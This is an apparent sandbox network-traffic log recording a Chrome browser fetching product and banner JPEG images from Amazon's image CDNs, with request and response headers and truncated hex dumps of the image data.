                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC920INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3095
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 5d7edabe-40a2-4bbd-afe9-91124f21a33a
                                                                                                                                                                                                        Date: Sat, 29 Jun 2024 00:34:01 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Sep 2021 13:15:56 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-806,/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NDZjYTNkNGMt-w186
                                                                                                                                                                                                        Expires: Fri, 24 Jun 2044 00:34:01 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-806 /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NDZjYTNkNGMt-w186
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 87e83cc6e8f384d40eab78133e901302.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 2164431
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: Wvytw_88ke_OM77I-w2B91dsAaCpdjC1EVpd_2C2Dt1GG4-rUAwUgA==
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC3095INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 84 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 32 00 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 07 08 09 06 05 04 01 03 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d4 00 00 00 00 1f 94 4e db da 24 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIFt"2N$


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        132192.168.2.44992018.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC450OUTGET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NGI2NmQ3NTEt-w186._SY116_CB642007527_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC921INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3097
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: ddc99f67-0490-4a87-855e-489008f2044f
                                                                                                                                                                                                        Date: Sat, 20 Jul 2024 16:10:46 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Sep 2021 13:15:56 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-051,/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NGI2NmQ3NTEt-w186
                                                                                                                                                                                                        Expires: Fri, 15 Jul 2044 16:10:46 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-051 /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NGI2NmQ3NTEt-w186
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 f75afc04e5fb2b66fe286e4f840886c6.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 2237242
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: 1xnVsqrQbJIQuH5F2QRiea21EOHoA8gGMfxST3x2LSHoJD8UYkGakw==
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC3097INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 01 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 05 07 04 06 08 03 02 09 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 01 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea 00 00 00 18 d8 7c d5 44 9f a3 7e b5
                                                                                                                                                                                                        Data Ascii: JFIF""$$6*&&*6>424>LDDL_Z_||""$$6*&&*6>424>LDDL_Z_||t"5|D~


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        133192.168.2.44992118.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC450OUTGET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-OTg1MGY5MmMt-w186._SY116_CB642007527_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC897INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 4015
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 336bab2a-c217-4cc4-b6b3-87dbe17d3c27
                                                                                                                                                                                                        Date: Wed, 07 Aug 2024 08:24:26 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Sep 2021 13:15:56 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-731,/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-OTg1MGY5MmMt-w186
                                                                                                                                                                                                        Expires: Tue, 02 Aug 2044 08:24:26 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-731 /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-OTg1MGY5MmMt-w186
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Via: 1.1 3f24561b20ab2825cb11ac40fc1c2434.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 329907
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: 4KnFwsg_1m8KpnVfWP5_CnjzuFp0u79skmkdshKXVvng1NPseUBZog==
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC4015INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 01 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 04 05 08 03 02 01 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 01 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea 00 00 00 8f 12 16 9f dc d8 b5 7a 72
                                                                                                                                                                                                        Data Ascii: JFIF""$$6*&&*6>424>LDDL_Z_||""$$6*&&*6>424>LDDL_Z_||t"5zr


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        134192.168.2.44991018.165.191.159443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC378OUTGET /images/I/31vRRFcgseL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC840INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 5118
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 83736800-f9e2-435a-b066-21541687b9e2
                                                                                                                                                                                                        Date: Tue, 30 Jul 2024 12:15:39 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Sun, 04 Feb 2024 06:28:58 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-461,/images/I/31vRRFcgseL
                                                                                                                                                                                                        Expires: Mon, 25 Jul 2044 12:15:39 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-461 /images/I/31vRRFcgseL
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 f6d3d027dc70c7291c2f685efb187ab2.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 33741
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: MDCwWvFuFcTJMWDrO1adzn89i5zgK0sSo08szOnelMMtp31DJB5wsQ==
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC5118INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 05 08 06 07 03 04 09 01 02 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b9 60 00 00 00 1d 13 bc d2 dc 77 8d da f9
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4`w


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        135192.168.2.44992318.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC378OUTGET /images/I/317I8lSNZAL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC841INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 5698
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: f5797c58-34ba-485b-81b5-641fac801844
                                                                                                                                                                                                        Date: Sat, 10 Aug 2024 22:31:18 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Sat, 13 Jul 2024 06:26:38 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-528,/images/I/317I8lSNZAL
                                                                                                                                                                                                        Expires: Fri, 05 Aug 2044 22:31:18 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-528 /images/I/317I8lSNZAL
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 2bb98457c96f801517f8d0d98344cd3c.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 272856
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: RMn88yPvan6ZJLVPtr9ywZqhnk3C4rFBiB7KU4u2tC91TBd3gLe7dg==
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC5698INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 04 05 06 07 02 03 09 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 99 60 00 00 00 00 00 0e 3a d6 5d 98 b0 df
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4`:]


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        136192.168.2.449927151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC715OUTGET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_18_BTS24_AE_GW_QC-CROSSA_DQC_CL_Beauty_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 4058
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 608709dd-b0d7-40dd-b6c0-2f40022c42f7
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 12 Aug 2024 11:45:09 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sun, 07 Aug 2044 13:12:50 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 260256
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:08 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100167-IAD, cache-nyc-kteb1890095-NYC
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 28 00 00 ff e1 03 1f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                                        Data Ascii: ExifII*Ducky(http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: e5 19 b2 a8 6d d8 96 4b 63 72 4c 5f 61 58 00 00 00 01 4b 1d 27 21 66 f4 35 d0 8e 91 e6 c7 9e 73 26 dc e1 f5 41 b3 e5 9b 3f 6a 54 cc 90 00 00 00 00 b7 11 98 c6 f6 fa 64 ef 35 1b 7a 84 5e 51 8d 57 9c 2b 1a 7b 89 76 22 12 1d 86 cf 90 28 cf 84 7f 55 a2 9c 0c e0 00 00 02 cd fd 2e 8f 5b db 3c 0c fe 20 a9 c8 00 00 8f e2 e2 e5 6b a5 43 20 00 00 00 b6 6a 4f af 45 50 55 80 00 03 41 53 5d be 19 00 00 ff da 00 08 01 02 00 01 05 01 cf 8d a7 75 1b f8 51 96 d5 55 b1 25 36 db 11 c8 69 a5 3c 3a c1 06 3d a2 e0 b5 45 c8 65 95 71 5e 77 e2 03 6d c7 1f 5d 5d e6 40 22 c1 0a 8e 1b 7c c1 09 e7 8d 0a 4b da 73 c2 54 d2 57 d4 6c 90 4b be 1a 3a f2 10 e3 b4 3d 8e 58 a5 a2 c8 5d 5c e4 fb 4e 58 7f 33 ff 00 57 93 ed 38 ff 00 ff da 00 08 01 03 00 01 05 01 cf 5c ed 71 ae 67 ed cf a7 0d 38
                                                                                                                                                                                                        Data Ascii: mKcrL_aXK'!f5s&A?jTd5z^QW+{v"(U.[< kC jOEPUAS]uQU%6i<:=Eeq^wm]]@"|KsTWlK:=X]\NX3W8\qg8
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1302INData Raw: 18 83 91 e9 dc e6 f1 34 28 ec a7 b7 4d a6 6b ec 28 f7 be 56 b3 1d be 5c e8 36 38 f9 24 13 cd 6d c1 d9 00 42 39 be df 48 81 bc 7a 97 5b 87 d2 31 35 ad d2 c5 70 86 58 cb e1 0f 05 a5 5a dc 70 35 01 7b f4 bc bb b8 64 03 9e bb 10 9e bc ab f7 4f cc b3 89 d6 5d c4 be 6e 1d b9 d4 7c cd ee b3 fd 2b e9 0d 38 28 27 12 99 57 94 87 04 55 69 07 c3 a3 23 a8 d0 3a 9d 34 72 3d a6 db de 40 72 0c ba fb e9 cd 8e 36 c5 13 1a 8c 6b 12 dc 71 3c 20 7a 59 34 91 87 4b 17 f6 de 73 1e ca 13 c9 1b 5d 2b 45 a1 e7 34 dd ef a0 f6 e9 a3 0e 69 56 94 c8 8c a8 c8 fd 33 1c f7 1b 8b 88 cc ef a4 18 01 90 1e 9d 17 b3 51 ff 00 95 4c 9f 44 5f d7 a4 71 b2 e5 2a 9e 39 d4 e6 db 71 40 3a 2d 34 b2 4b 1c 41 9c d1 f7 1d 6a dc cb 70 c3 be a4 69 96 29 1d 6c 7f da 75 c8 10 a2 e0 33 e9 1a 25 0e 21 84 a9 6e
                                                                                                                                                                                                        Data Ascii: 4(Mk(V\68$mB9Hz[15pXZp5{dO]n|+8('WUi#:4r=@r6kq< zY4Ks]+E4iV3QLD_q*9q@:-4KAjpi)lu3%!n


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        137192.168.2.449930151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC721OUTGET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_19_BTS24_AE_GW_QC-CROSSA_DQC_CL_PersonalCare_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 4253
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 0ceb3c14-155c-4615-a0d2-deb89fea65e0
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 12 Aug 2024 11:45:09 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sun, 07 Aug 2044 13:12:50 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 260255
